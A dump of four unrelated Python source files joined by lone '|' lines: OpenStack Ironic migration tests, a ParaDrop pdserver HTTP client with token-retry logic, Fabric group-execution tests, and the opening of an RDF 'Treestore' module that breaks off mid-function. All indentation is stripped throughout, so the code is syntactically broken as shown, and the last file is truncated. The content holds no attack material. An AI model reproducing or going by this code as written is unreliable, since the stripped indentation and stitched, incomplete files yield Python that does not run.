# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for database migrations. There are "opportunistic" tests for both mysql
and postgresql in here, which allows testing against these databases in a
properly configured unit test environment.
For the opportunistic testing you need to set up a db named 'openstack_citest'
with user 'openstack_citest' and password 'openstack_citest' on localhost.
The test will then use that db and u/p combo to run the tests.
For postgres on Ubuntu this can be done with the following commands:
::
sudo -u postgres psql
postgres=# create user openstack_citest with createdb login password
'openstack_citest';
postgres=# create database openstack_citest with owner openstack_citest;
"""
import contextlib
from alembic import script
import mock
from oslo_db import exception as db_exc
from oslo_db.sqlalchemy import enginefacade
from oslo_db.sqlalchemy import test_base
from oslo_db.sqlalchemy import test_migrations
from oslo_db.sqlalchemy import utils as db_utils
from oslo_log import log as logging
from oslo_utils import uuidutils
import sqlalchemy
import sqlalchemy.exc
from ironic.common.i18n import _LE
from ironic.db.sqlalchemy import migration
from ironic.db.sqlalchemy import models
from ironic.tests import base
LOG = logging.getLogger(__name__)
def _get_connect_string(backend, user, passwd, database):
"""Get database connection
Try to get a connection with a very specific set of values, if we get
these then we'll run the tests, otherwise they are skipped
"""
if backend == "postgres":
backend = "postgresql+psycopg2"
elif backend == "mysql":
backend = "mysql+mysqldb"
else:
raise Exception("Unrecognized backend: '%s'" % backend)
return ("%(backend)s://%(user)s:%(passwd)s@localhost/%(database)s"
% {'backend': backend, 'user': user, 'passwd': passwd,
'database': database})
def _is_backend_avail(backend, user, passwd, database):
try:
connect_uri = _get_connect_string(backend, user, passwd, database)
engine = sqlalchemy.create_engine(connect_uri)
connection = engine.connect()
except Exception:
# intentionally catch all to handle exceptions even if we don't
# have any backend code loaded.
return False
else:
connection.close()
engine.dispose()
return True
@contextlib.contextmanager
def patch_with_engine(engine):
with mock.patch.object(enginefacade.get_legacy_facade(),
'get_engine') as patch_engine:
patch_engine.return_value = engine
yield
class WalkVersionsMixin(object):
def _walk_versions(self, engine=None, alembic_cfg=None, downgrade=True):
# Determine latest version script from the repo, then
# upgrade from 1 through to the latest, with no data
# in the databases. This just checks that the schema itself
# upgrades successfully.
# Place the database under version control
with patch_with_engine(engine):
script_directory = script.ScriptDirectory.from_config(alembic_cfg)
self.assertIsNone(self.migration_api.version(alembic_cfg))
versions = [ver for ver in script_directory.walk_revisions()]
for version in reversed(versions):
self._migrate_up(engine, alembic_cfg,
version.revision, with_data=True)
if downgrade:
for version in versions:
self._migrate_down(engine, alembic_cfg, version.revision)
def _migrate_down(self, engine, config, version, with_data=False):
try:
self.migration_api.downgrade(version, config=config)
except NotImplementedError:
# NOTE(sirp): some migrations, namely release-level
# migrations, don't support a downgrade.
return False
self.assertEqual(version, self.migration_api.version(config))
# NOTE(sirp): `version` is what we're downgrading to (i.e. the 'target'
# version). So if we have any downgrade checks, they need to be run for
# the previous (higher numbered) migration.
if with_data:
post_downgrade = getattr(
self, "_post_downgrade_%s" % (version), None)
if post_downgrade:
post_downgrade(engine)
return True
def _migrate_up(self, engine, config, version, with_data=False):
"""migrate up to a new version of the db.
We allow for data insertion and post checks at every
migration version with special _pre_upgrade_### and
_check_### functions in the main test.
"""
# NOTE(sdague): try block is here because it's impossible to debug
# where a failed data migration happens otherwise
try:
if with_data:
data = None
pre_upgrade = getattr(
self, "_pre_upgrade_%s" % version, None)
if pre_upgrade:
data = pre_upgrade(engine)
self.migration_api.upgrade(version, config=config)
self.assertEqual(version, self.migration_api.version(config))
if with_data:
check = getattr(self, "_check_%s" % version, None)
if check:
check(engine, data)
except Exception:
LOG.error(_LE("Failed to migrate to version %(version)s on engine "
"%(engine)s"),
{'version': version, 'engine': engine})
raise
class TestWalkVersions(base.TestCase, WalkVersionsMixin):
def setUp(self):
super(TestWalkVersions, self).setUp()
self.migration_api = mock.MagicMock()
self.engine = mock.MagicMock()
self.config = mock.MagicMock()
self.versions = [mock.Mock(revision='2b2'), mock.Mock(revision='1a1')]
def test_migrate_up(self):
self.migration_api.version.return_value = 'dsa123'
self._migrate_up(self.engine, self.config, 'dsa123')
self.migration_api.upgrade.assert_called_with('dsa123',
config=self.config)
self.migration_api.version.assert_called_with(self.config)
def test_migrate_up_with_data(self):
test_value = {"a": 1, "b": 2}
self.migration_api.version.return_value = '141'
self._pre_upgrade_141 = mock.MagicMock()
self._pre_upgrade_141.return_value = test_value
self._check_141 = mock.MagicMock()
self._migrate_up(self.engine, self.config, '141', True)
self._pre_upgrade_141.assert_called_with(self.engine)
self._check_141.assert_called_with(self.engine, test_value)
def test_migrate_down(self):
self.migration_api.version.return_value = '42'
self.assertTrue(self._migrate_down(self.engine, self.config, '42'))
self.migration_api.version.assert_called_with(self.config)
def test_migrate_down_not_implemented(self):
self.migration_api.downgrade.side_effect = NotImplementedError
self.assertFalse(self._migrate_down(self.engine, self.config, '42'))
def test_migrate_down_with_data(self):
self._post_downgrade_043 = mock.MagicMock()
self.migration_api.version.return_value = '043'
self._migrate_down(self.engine, self.config, '043', True)
self._post_downgrade_043.assert_called_with(self.engine)
@mock.patch.object(script, 'ScriptDirectory')
@mock.patch.object(WalkVersionsMixin, '_migrate_up')
@mock.patch.object(WalkVersionsMixin, '_migrate_down')
def test_walk_versions_all_default(self, _migrate_up, _migrate_down,
script_directory):
fc = script_directory.from_config()
fc.walk_revisions.return_value = self.versions
self.migration_api.version.return_value = None
self._walk_versions(self.engine, self.config)
self.migration_api.version.assert_called_with(self.config)
upgraded = [mock.call(self.engine, self.config, v.revision,
with_data=True) for v in reversed(self.versions)]
self.assertEqual(self._migrate_up.call_args_list, upgraded)
downgraded = [mock.call(self.engine, self.config, v.revision)
for v in self.versions]
self.assertEqual(self._migrate_down.call_args_list, downgraded)
@mock.patch.object(script, 'ScriptDirectory')
@mock.patch.object(WalkVersionsMixin, '_migrate_up')
@mock.patch.object(WalkVersionsMixin, '_migrate_down')
def test_walk_versions_all_false(self, _migrate_up, _migrate_down,
script_directory):
fc = script_directory.from_config()
fc.walk_revisions.return_value = self.versions
self.migration_api.version.return_value = None
self._walk_versions(self.engine, self.config, downgrade=False)
upgraded = [mock.call(self.engine, self.config, v.revision,
with_data=True) for v in reversed(self.versions)]
self.assertEqual(upgraded, self._migrate_up.call_args_list)
class MigrationCheckersMixin(object):
def setUp(self):
super(MigrationCheckersMixin, self).setUp()
self.config = migration._alembic_config()
self.migration_api = migration
def test_walk_versions(self):
self._walk_versions(self.engine, self.config, downgrade=False)
def test_connect_fail(self):
"""Test that we can trigger a database connection failure
Test that we can fail gracefully to ensure we don't break people
without specific database backend
"""
if _is_backend_avail(self.FIXTURE.DRIVER, "openstack_cifail",
self.FIXTURE.USERNAME, self.FIXTURE.DBNAME):
self.fail("Shouldn't have connected")
def _check_21b331f883ef(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
col_names = [column.name for column in nodes.c]
self.assertIn('provision_updated_at', col_names)
self.assertIsInstance(nodes.c.provision_updated_at.type,
sqlalchemy.types.DateTime)
def _check_3cb628139ea4(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
col_names = [column.name for column in nodes.c]
self.assertIn('console_enabled', col_names)
# in some backends bool type is integer
self.assertTrue(isinstance(nodes.c.console_enabled.type,
sqlalchemy.types.Boolean) or
isinstance(nodes.c.console_enabled.type,
sqlalchemy.types.Integer))
def _check_31baaf680d2b(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
col_names = [column.name for column in nodes.c]
self.assertIn('instance_info', col_names)
self.assertIsInstance(nodes.c.instance_info.type,
sqlalchemy.types.TEXT)
def _check_3bea56f25597(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
instance_uuid = 'aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee'
data = {'driver': 'fake',
'uuid': uuidutils.generate_uuid(),
'instance_uuid': instance_uuid}
nodes.insert().values(data).execute()
data['uuid'] = uuidutils.generate_uuid()
self.assertRaises(db_exc.DBDuplicateEntry,
nodes.insert().execute, data)
def _check_242cc6a923b3(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
col_names = [column.name for column in nodes.c]
self.assertIn('maintenance_reason', col_names)
self.assertIsInstance(nodes.c.maintenance_reason.type,
sqlalchemy.types.String)
def _pre_upgrade_5674c57409b9(self, engine):
# add some nodes in various states so we can assert that "None"
# was replaced by "available", and nothing else changed.
nodes = db_utils.get_table(engine, 'nodes')
data = [{'uuid': uuidutils.generate_uuid(),
'provision_state': 'fake state'},
{'uuid': uuidutils.generate_uuid(),
'provision_state': 'active'},
{'uuid': uuidutils.generate_uuid(),
'provision_state': 'deleting'},
{'uuid': uuidutils.generate_uuid(),
'provision_state': None}]
nodes.insert().values(data).execute()
return data
def _check_5674c57409b9(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
result = engine.execute(nodes.select())
def _get_state(uuid):
for row in data:
if row['uuid'] == uuid:
return row['provision_state']
for row in result:
old = _get_state(row['uuid'])
new = row['provision_state']
if old is None:
self.assertEqual('available', new)
else:
self.assertEqual(old, new)
def _check_bb59b63f55a(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
col_names = [column.name for column in nodes.c]
self.assertIn('driver_internal_info', col_names)
self.assertIsInstance(nodes.c.driver_internal_info.type,
sqlalchemy.types.TEXT)
def _check_4f399b21ae71(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
col_names = [column.name for column in nodes.c]
self.assertIn('clean_step', col_names)
self.assertIsInstance(nodes.c.clean_step.type,
sqlalchemy.types.String)
def _check_789acc877671(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
col_names = [column.name for column in nodes.c]
self.assertIn('raid_config', col_names)
self.assertIn('target_raid_config', col_names)
self.assertIsInstance(nodes.c.raid_config.type,
sqlalchemy.types.String)
self.assertIsInstance(nodes.c.target_raid_config.type,
sqlalchemy.types.String)
def _check_2fb93ffd2af1(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
bigstring = 'a' * 255
uuid = uuidutils.generate_uuid()
data = {'uuid': uuid, 'name': bigstring}
nodes.insert().execute(data)
node = nodes.select(nodes.c.uuid == uuid).execute().first()
self.assertEqual(bigstring, node['name'])
def _check_516faf1bb9b1(self, engine, data):
nodes = db_utils.get_table(engine, 'nodes')
bigstring = 'a' * 255
uuid = uuidutils.generate_uuid()
data = {'uuid': uuid, 'driver': bigstring}
nodes.insert().execute(data)
node = nodes.select(nodes.c.uuid == uuid).execute().first()
self.assertEqual(bigstring, node['driver'])
def _check_48d6c242bb9b(self, engine, data):
node_tags = db_utils.get_table(engine, 'node_tags')
col_names = [column.name for column in node_tags.c]
self.assertIn('tag', col_names)
self.assertIsInstance(node_tags.c.tag.type,
sqlalchemy.types.String)
nodes = db_utils.get_table(engine, 'nodes')
data = {'id': '123', 'name': 'node1'}
nodes.insert().execute(data)
data = {'node_id': '123', 'tag': 'tag1'}
node_tags.insert().execute(data)
tag = node_tags.select(node_tags.c.node_id == '123').execute().first()
self.assertEqual('tag1', tag['tag'])
def _check_5ea1b0d310e(self, engine, data):
portgroup = db_utils.get_table(engine, 'portgroups')
col_names = [column.name for column in portgroup.c]
expected_names = ['created_at', 'updated_at', 'id', 'uuid', 'name',
'node_id', 'address', 'extra']
self.assertEqual(sorted(expected_names), sorted(col_names))
self.assertIsInstance(portgroup.c.created_at.type,
sqlalchemy.types.DateTime)
self.assertIsInstance(portgroup.c.updated_at.type,
sqlalchemy.types.DateTime)
self.assertIsInstance(portgroup.c.id.type,
sqlalchemy.types.Integer)
self.assertIsInstance(portgroup.c.uuid.type,
sqlalchemy.types.String)
self.assertIsInstance(portgroup.c.name.type,
sqlalchemy.types.String)
self.assertIsInstance(portgroup.c.node_id.type,
sqlalchemy.types.Integer)
self.assertIsInstance(portgroup.c.address.type,
sqlalchemy.types.String)
self.assertIsInstance(portgroup.c.extra.type,
sqlalchemy.types.TEXT)
ports = db_utils.get_table(engine, 'ports')
col_names = [column.name for column in ports.c]
self.assertIn('pxe_enabled', col_names)
self.assertIn('portgroup_id', col_names)
self.assertIn('local_link_connection', col_names)
self.assertIsInstance(ports.c.portgroup_id.type,
sqlalchemy.types.Integer)
# in some backends bool type is integer
self.assertTrue(isinstance(ports.c.pxe_enabled.type,
sqlalchemy.types.Boolean) or
isinstance(ports.c.pxe_enabled.type,
sqlalchemy.types.Integer))
def test_upgrade_and_version(self):
with patch_with_engine(self.engine):
self.migration_api.upgrade('head')
self.assertIsNotNone(self.migration_api.version())
def test_create_schema_and_version(self):
with patch_with_engine(self.engine):
self.migration_api.create_schema()
self.assertIsNotNone(self.migration_api.version())
def test_upgrade_and_create_schema(self):
with patch_with_engine(self.engine):
self.migration_api.upgrade('31baaf680d2b')
self.assertRaises(db_exc.DbMigrationError,
self.migration_api.create_schema)
def test_upgrade_twice(self):
with patch_with_engine(self.engine):
self.migration_api.upgrade('31baaf680d2b')
v1 = self.migration_api.version()
self.migration_api.upgrade('head')
v2 = self.migration_api.version()
self.assertNotEqual(v1, v2)
class TestMigrationsMySQL(MigrationCheckersMixin,
WalkVersionsMixin,
test_base.MySQLOpportunisticTestCase):
pass
class TestMigrationsPostgreSQL(MigrationCheckersMixin,
WalkVersionsMixin,
test_base.PostgreSQLOpportunisticTestCase):
pass
class ModelsMigrationSyncMixin(object):
def get_metadata(self):
return models.Base.metadata
def get_engine(self):
return self.engine
def db_sync(self, engine):
with patch_with_engine(engine):
migration.upgrade('head')
class ModelsMigrationsSyncMysql(ModelsMigrationSyncMixin,
test_migrations.ModelsMigrationsSync,
test_base.MySQLOpportunisticTestCase):
pass
class ModelsMigrationsSyncPostgres(ModelsMigrationSyncMixin,
test_migrations.ModelsMigrationsSync,
test_base.PostgreSQLOpportunisticTestCase):
pass
|
|
from __future__ import print_function
import json
import pycurl
import re
import six
import urllib
import twisted
from twisted.internet import reactor, threads
from twisted.internet.defer import Deferred, DeferredLock, DeferredSemaphore
from twisted.internet.protocol import Protocol
from twisted.web.client import Agent, FileBodyProducer, HTTPConnectionPool
from twisted.web.http_headers import Headers
from paradrop.base import nexus, settings
class JSONReceiver(Protocol):
"""
JSON Receiver
A JSONReceiver object can be used with the twisted HTTP client
to receive data from a request and provide it to a callback
function when complete.
Example (response came from an HTTP request):
finished = Deferred()
response.deliverBody(JSONReceiver(finished))
finished.addCallback(func_that_takes_result)
Some error conditions will result in the callback firing with a result of
None. The receiver needs to check for this. This seems to occur on 403
errors where the server does not return any data, but twisted just passes
us a ResponseDone object the same type as a normal result.
"""
def __init__(self, response, finished):
"""
response: a twisted Response object
finished: a Deferred object
"""
self.response = response
self.finished = finished
self.data = ""
def dataReceived(self, data):
"""
internal: handles incoming data.
"""
self.data += data
def connectionLost(self, reason):
"""
internal: handles connection close events.
"""
if reason.check(twisted.web.client.ResponseDone):
try:
result = json.loads(self.data)
except ValueError:
result = None
self.finished.callback(PDServerResponse(self.response, data=result))
else:
raise Exception(reason.getErrorMessage())
def urlEncodeParams(data):
"""
Return data URL-encoded.
This function specifically handles None and boolean values
to convert them to JSON-friendly strings (e.g. None -> 'null').
"""
copy = dict()
for key, value in six.iteritems(data):
if value is None:
copy[key] = 'null'
elif isinstance(value, bool):
copy[key] = json.dumps(value)
else:
copy[key] = value
return urllib.urlencode(copy, doseq=True)
class PDServerResponse(object):
"""
A PDServerResponse object contains the results of a request to pdserver.
This wraps twisted.web.client.Response (cannot be subclassed) and exposes
the same variables in addition to a 'data' variables. The 'data' variable,
if not None, is the parsed object from the response body.
"""
def __init__(self, response, data=None):
self.version = response.version
self.code = response.code
self.phrase = response.phrase
self.headers = response.headers
self.length = response.length
self.success = (response.code >= 200 and response.code < 300)
self.data = data
class HTTPResponse(object):
def __init__(self, data=None):
self.version = None
self.code = None
self.phrase = None
self.headers = dict()
self.length = None
self.success = False
self.data = data
class HTTPRequestDriver(object):
def __init__(self):
self.headers = {
"Accept": "application/json",
"Connection": "keep-alive",
"Content-Type": "application/json",
"User-Agent": "ParaDrop/2.5"
}
def request(self, method, url, body):
raise Exception("Not implemented")
def setHeader(self, key, value):
self.headers[key] = value
class CurlRequestDriver(HTTPRequestDriver):
# Shared curl handle.
# May have problems due to issue #411.
# https://github.com/pycurl/pycurl/issues/411
curl = pycurl.Curl()
# Lock for the access to curl.
lock = DeferredLock()
code_pattern = re.compile("(HTTP\S*)\s+(\d+)\s+(.*)")
header_pattern = re.compile("(\S+): (.*)")
def __init__(self):
super(CurlRequestDriver, self).__init__()
# Buffer for receiving response.
self.buffer = six.StringIO()
# Fill in response object.
self.response = HTTPResponse()
def receive(self, ignore):
"""
Receive response from curl and convert it to a response object.
"""
data = self.buffer.getvalue()
response = self.response
# Try to parse the content if it's JSON.
contentType = response.headers.get('content-type', 'text/html')
if 'json' in contentType:
try:
response.data = json.loads(data)
except Exception:
print("Failed to parse JSON")
print(data)
response.data = data
else:
response.data = data
response.success = (response.code >= 200 and response.code < 300)
return response
def receiveHeaders(self, header_line):
header_line = header_line.strip()
match = CurlRequestDriver.code_pattern.match(header_line)
if match is not None:
self.response.version = match.group(1)
self.response.code = int(match.group(2))
self.response.phrase = match.group(3)
return
match = CurlRequestDriver.header_pattern.match(header_line)
if match is not None:
key = match.group(1).lower()
self.response.headers[key] = match.group(2)
def request(self, method, url, body=None):
def makeRequest(ignored):
curl = CurlRequestDriver.curl
curl.reset()
curl.setopt(pycurl.URL, url)
curl.setopt(pycurl.HEADERFUNCTION, self.receiveHeaders)
curl.setopt(pycurl.WRITEFUNCTION, self.buffer.write)
curl.setopt(pycurl.CUSTOMREQUEST, method)
if body is not None:
curl.setopt(pycurl.POSTFIELDS, body)
headers = []
for key, value in six.iteritems(self.headers):
headers.append("{}: {}".format(key, value))
curl.setopt(pycurl.HTTPHEADER, headers)
d = threads.deferToThread(curl.perform)
d.addCallback(self.receive)
return d
def releaseLock(result):
CurlRequestDriver.lock.release()
# Forward the result to the next handler.
return result
d = CurlRequestDriver.lock.acquire()
# Make the request once we acquire the semaphore.
d.addCallback(makeRequest)
# Release the semaphore regardless of how the request goes.
d.addBoth(releaseLock)
return d
class TwistedRequestDriver(HTTPRequestDriver):
# Using a connection pool enables persistent connections, so we can avoid
# the connection setup overhead when sending multiple messages to the
# server.
pool = HTTPConnectionPool(reactor, persistent=True)
# Used to control the number of concurrent requests because
# HTTPConnectionPool does not do that on its own.
# Discussed here:
# http://stackoverflow.com/questions/25552432/how-to-make-pooling-http-connection-with-twisted
sem = DeferredSemaphore(settings.PDSERVER_MAX_CONCURRENT_REQUESTS)
def receive(self, response):
"""
Receive response from twisted web client and convert it to a
PDServerResponse object.
"""
deferred = Deferred()
response.deliverBody(JSONReceiver(response, deferred))
return deferred
def request(self, method, url, body=None):
def makeRequest(ignored):
bodyProducer = None
if body is not None:
bodyProducer = FileBodyProducer(six.StringIO(body))
headers = {}
for key, value in six.iteritems(self.headers):
headers[key] = [value]
agent = Agent(reactor, pool=TwistedRequestDriver.pool)
d = agent.request(method, url, Headers(headers), bodyProducer)
d.addCallback(self.receive)
return d
def releaseSemaphore(result):
TwistedRequestDriver.sem.release()
# Forward the result to the next handler.
return result
d = TwistedRequestDriver.sem.acquire()
# Make the request once we acquire the semaphore.
d.addCallback(makeRequest)
# Release the semaphore regardless of how the request goes.
d.addBoth(releaseSemaphore)
return d
class PDServerRequest(object):
"""
Make an HTTP request to pdserver.
The API is assumed to use application/json for sending and receiving data.
Authentication is automatically handled here if the router is provisioned.
We handle missing, invalid, or expired tokens by making the request and
detecting a 401 (Unauthorized) response. We request a new token and retry
the failed request. We do this at most once and return failure if the
second attempt returns anything other than 200 (OK).
PDServerRequest objects are not reusable; create a new one for each
request.
URL String Substitutions:
router_id -> router id
Example:
/routers/{router_id}/states -> /routers/halo06/states
"""
# Auth token (JWT): we will automatically request as needed (for the first
# request and after expiration) and store the token in memory for future
# requests.
token = None
def __init__(self, path, driver=TwistedRequestDriver, headers={}, setAuthHeader=True):
self.path = path
self.driver = driver
self.headers = headers
self.setAuthHeader = setAuthHeader
self.transportRetries = 0
url = nexus.core.info.pdserver
if not path.startswith('/'):
url += '/'
url += path
# Perform string substitutions.
self.url = url.format(router_id=nexus.core.info.pdid)
self.body = None
def get(self, **query):
self.method = 'GET'
if len(query) > 0:
self.url += '?' + urlEncodeParams(query)
d = self.request()
d.addCallback(self.receiveResponse)
return d
def patch(self, *ops):
"""
Expects a list of operations in jsonpatch format (http://jsonpatch.com/).
An example operation would be:
{'op': 'replace', 'path': '/completed', 'value': True}
"""
self.method = 'PATCH'
self.body = json.dumps(ops)
d = self.request()
d.addCallback(self.receiveResponse)
return d
def post(self, **data):
self.method = 'POST'
self.body = json.dumps(data)
d = self.request()
d.addCallback(self.receiveResponse)
return d
def put(self, **data):
self.method = 'PUT'
self.body = json.dumps(data)
d = self.request()
d.addCallback(self.receiveResponse)
return d
def request(self):
driver = self.driver()
if self.setAuthHeader and PDServerRequest.token is not None:
auth = 'Bearer {}'.format(PDServerRequest.token)
driver.setHeader('Authorization', auth)
for key, value in six.iteritems(self.headers):
driver.setHeader(key, value)
return driver.request(self.method, self.url, self.body)
def receiveResponse(self, response):
"""
Intercept the response object, and if it's a 401 authenticate and retry.
"""
if response.code == 401 and self.setAuthHeader:
# 401 (Unauthorized) may mean our token is no longer valid.
# Request a new token and then retry the request.
#
# Watch out for infinite recursion here! If this inner request
# returns a 401 code, meaning the id/password is invalid, it should
# not go down this code path again (prevented by check against
# self.setAuthHeader above).
authRequest = PDServerRequest('/auth/router', driver=self.driver,
setAuthHeader=False)
d = authRequest.post(id=nexus.core.info.pdid,
password=nexus.core.getKey('apitoken'))
def cbLogin(authResponse):
if authResponse.success:
PDServerRequest.token = authResponse.data.get('token', None)
# Retry the original request now that we have a new token.
return self.request()
else:
# Our attempt to get a token failed, so give up.
return PDServerResponse(response)
d.addCallback(cbLogin)
return d
else:
return response
@classmethod
def getServerInfo(c):
"""
Return the information needed to send API messages to the server.
This can be used by an external program (e.g. pdinstall).
"""
info = {
'authorization': 'Bearer {}'.format(c.token),
'router_id': nexus.core.info.pdid,
'server': nexus.core.info.pdserver
}
return info
@classmethod
def resetToken(c):
"""
Reset the auth token, to be called if the router's identity has changed.
"""
c.token = None
# Initialize pycurl. Does this do anything?
pycurl.global_init(pycurl.GLOBAL_ALL)
# Set the number of connections that can be kept alive in the connection pool.
# Setting this equal to the size of the semaphore should prevent churn.
TwistedRequestDriver.pool.maxPersistentPerHost = settings.PDSERVER_MAX_CONCURRENT_REQUESTS
|
|
from mock import Mock, patch, call
from pytest_relaxed import raises
from fabric import Connection, Group, SerialGroup, ThreadingGroup, GroupResult
from fabric.group import thread_worker
from fabric.exceptions import GroupException
class Group_:
class init:
"__init__"
def may_be_empty(self):
assert len(Group()) == 0
def takes_splat_arg_of_host_strings(self):
g = Group("foo", "bar")
assert g[0].host == "foo"
assert g[1].host == "bar"
class from_connections:
def inits_from_iterable_of_Connections(self):
g = Group.from_connections((Connection("foo"), Connection("bar")))
assert len(g) == 2
assert g[1].host == "bar"
def acts_like_an_iterable_of_Connections(self):
g = Group("foo", "bar", "biz")
assert g[0].host == "foo"
assert g[-1].host == "biz"
assert len(g) == 3
for c in g:
assert isinstance(c, Connection)
class run:
@raises(NotImplementedError)
def not_implemented_in_base_class(self):
Group().run()
def _make_serial_tester(cxns, index, args, kwargs):
args = args[:]
kwargs = kwargs.copy()
def tester(*a, **k): # Don't care about doing anything with our own args.
car, cdr = index, index + 1
predecessors = cxns[:car]
successors = cxns[cdr:]
for predecessor in predecessors:
predecessor.run.assert_called_with(*args, **kwargs)
for successor in successors:
assert not successor.run.called
return tester
class SerialGroup_:
class run:
def executes_arguments_on_contents_run_serially(self):
"executes arguments on contents' run() serially"
cxns = [Connection(x) for x in ("host1", "host2", "host3")]
args = ("command",)
kwargs = {"hide": True, "warn": True}
for index, cxn in enumerate(cxns):
side_effect = _make_serial_tester(cxns, index, args, kwargs)
cxn.run = Mock(side_effect=side_effect)
g = SerialGroup.from_connections(cxns)
g.run(*args, **kwargs)
# Sanity check, e.g. in case none of them were actually run
for cxn in cxns:
cxn.run.assert_called_with(*args, **kwargs)
def errors_in_execution_capture_and_continue_til_end(self):
cxns = [Mock(name=x) for x in ("host1", "host2", "host3")]
class OhNoz(Exception):
pass
onoz = OhNoz()
cxns[1].run.side_effect = onoz
g = SerialGroup.from_connections(cxns)
try:
g.run("whatever", hide=True)
except GroupException as e:
result = e.result
else:
assert False, "Did not raise GroupException!"
succeeded = {
cxns[0]: cxns[0].run.return_value,
cxns[2]: cxns[2].run.return_value,
}
failed = {cxns[1]: onoz}
expected = succeeded.copy()
expected.update(failed)
assert result == expected
assert result.succeeded == succeeded
assert result.failed == failed
def returns_results_mapping(self):
cxns = [Mock(name=x) for x in ("host1", "host2", "host3")]
g = SerialGroup.from_connections(cxns)
result = g.run("whatever", hide=True)
assert isinstance(result, GroupResult)
expected = {x: x.run.return_value for x in cxns}
assert result == expected
assert result.succeeded == expected
assert result.failed == {}
class ThreadingGroup_:
def setup(self):
self.cxns = [Connection(x) for x in ("host1", "host2", "host3")]
self.args = ("command",)
self.kwargs = {"hide": True, "warn": True}
class run:
@patch("fabric.group.Queue")
@patch("fabric.group.ExceptionHandlingThread")
def executes_arguments_on_contents_run_via_threading(
self, Thread, Queue
):
queue = Queue.return_value
g = ThreadingGroup.from_connections(self.cxns)
# Make sure .exception() doesn't yield truthy Mocks. Otherwise we
# end up with 'exceptions' that cause errors due to all being the
# same.
Thread.return_value.exception.return_value = None
g.run(*self.args, **self.kwargs)
# Testing that threads were used the way we expect is mediocre but
# I honestly can't think of another good way to assert "threading
# was used & concurrency occurred"...
instantiations = [
call(
target=thread_worker,
kwargs=dict(
cxn=cxn,
queue=queue,
args=self.args,
kwargs=self.kwargs,
),
)
for cxn in self.cxns
]
Thread.assert_has_calls(instantiations, any_order=True)
# These ought to work as by default a Mock.return_value is a
# singleton mock object
expected = len(self.cxns)
for name, got in (
("start", Thread.return_value.start.call_count),
("join", Thread.return_value.join.call_count),
):
err = (
"Expected {} calls to ExceptionHandlingThread.{}, got {}"
) # noqa
err = err.format(expected, name, got)
assert expected, got == err
@patch("fabric.group.Queue")
def queue_used_to_return_results(self, Queue):
# Regular, explicit, mocks for Connections
cxns = [Mock(host=x) for x in ("host1", "host2", "host3")]
# Set up Queue with enough behavior to work / assert
queue = Queue.return_value
# Ending w/ a True will terminate a while-not-empty loop
queue.empty.side_effect = (False, False, False, True)
fakes = [(x, x.run.return_value) for x in cxns]
queue.get.side_effect = fakes[:]
# Execute & inspect results
g = ThreadingGroup.from_connections(cxns)
results = g.run(*self.args, **self.kwargs)
expected = {x: x.run.return_value for x in cxns}
assert results == expected
# Make sure queue was used as expected within worker &
# ThreadingGroup.run()
puts = [call(x) for x in fakes]
queue.put.assert_has_calls(puts, any_order=True)
assert queue.empty.called
gets = [call(block=False) for _ in cxns]
queue.get.assert_has_calls(gets)
def bubbles_up_errors_within_threads(self):
# TODO: I feel like this is the first spot where a raw
# ThreadException might need tweaks, at least presentation-wise,
# since we're no longer dealing with truly background threads (IO
# workers and tunnels), but "middle-ground" threads the user is
# kind of expecting (and which they might expect to encounter
# failures).
cxns = [Mock(host=x) for x in ("host1", "host2", "host3")]
class OhNoz(Exception):
pass
onoz = OhNoz()
cxns[1].run.side_effect = onoz
g = ThreadingGroup.from_connections(cxns)
try:
g.run(*self.args, **self.kwargs)
except GroupException as e:
result = e.result
else:
assert False, "Did not raise GroupException!"
succeeded = {
cxns[0]: cxns[0].run.return_value,
cxns[2]: cxns[2].run.return_value,
}
failed = {cxns[1]: onoz}
expected = succeeded.copy()
expected.update(failed)
assert result == expected
assert result.succeeded == succeeded
assert result.failed == failed
def returns_results_mapping(self):
# TODO: update if/when we implement ResultSet
cxns = [Mock(name=x) for x in ("host1", "host2", "host3")]
g = ThreadingGroup.from_connections(cxns)
result = g.run("whatever", hide=True)
assert isinstance(result, GroupResult)
expected = {x: x.run.return_value for x in cxns}
assert result == expected
assert result.succeeded == expected
assert result.failed == {}
|
|
#!/usr/bin/env python
import Bio.Phylo as bp
import os
import re
import sha
import shutil
import sys
import pypyodbc as pyodbc
from pruner import Prunable
from annotate import Annotatable
from config import get_treestore_kwargs, base_uri, load_dir
import tempfile
import phylolabel
import time
from cStringIO import StringIO
import posixpath
from getpass import getpass
import rdflib
__version__ = '0.1.2'
kwargs = get_treestore_kwargs()
class Treestore(Prunable, Annotatable):
prefixes = [
('rdf', 'http://www.w3.org/1999/02/22-rdf-syntax-ns#'),
('rdfs', 'http://www.w3.org/2000/01/rdf-schema#'),
('owl', 'http://www.w3.org/2002/07/owl#'),
('dc', 'http://purl.org/dc/elements/1.1/'),
('skos', 'http://www.w3.org/2004/02/skos/core#'),
('bibo', 'http://purl.org/ontology/bibo/'),
('foaf', 'http://xmlns.com/foaf/0.1/'),
('prism', 'http://prismstandard.org/namespaces/basic/2.0/'),
('obo', 'http://purl.obolibrary.org/obo/'),
('doi', 'http://dx.doi.org/')
]
def __init__(self, dsn=kwargs['dsn'], user=kwargs['user'], password=kwargs['password'],
load_dir=load_dir, base_uri=base_uri, verbose=False):
'''Create a treestore object from an ODBC connection with given DSN,
username and password.'''
self.dsn = dsn
self.user = user
self.password = password
self.load_dir = load_dir
self.base_uri = base_uri
self.verbose = verbose
self._connection = None
self._cursor = None
@classmethod
def uri_from_id(self, x, base_uri=base_uri):
if '://' in x: return x
if not x.endswith('/'): x += '/'
return posixpath.join(base_uri, x)
@classmethod
def id_from_uri(self, x, base_uri=base_uri):
if x.startswith(base_uri): x = x[len(base_uri):].rstrip('/')
return x
def validate_filter(self, x):
if not x: return x
for banned_word in 'delete', 'insert':
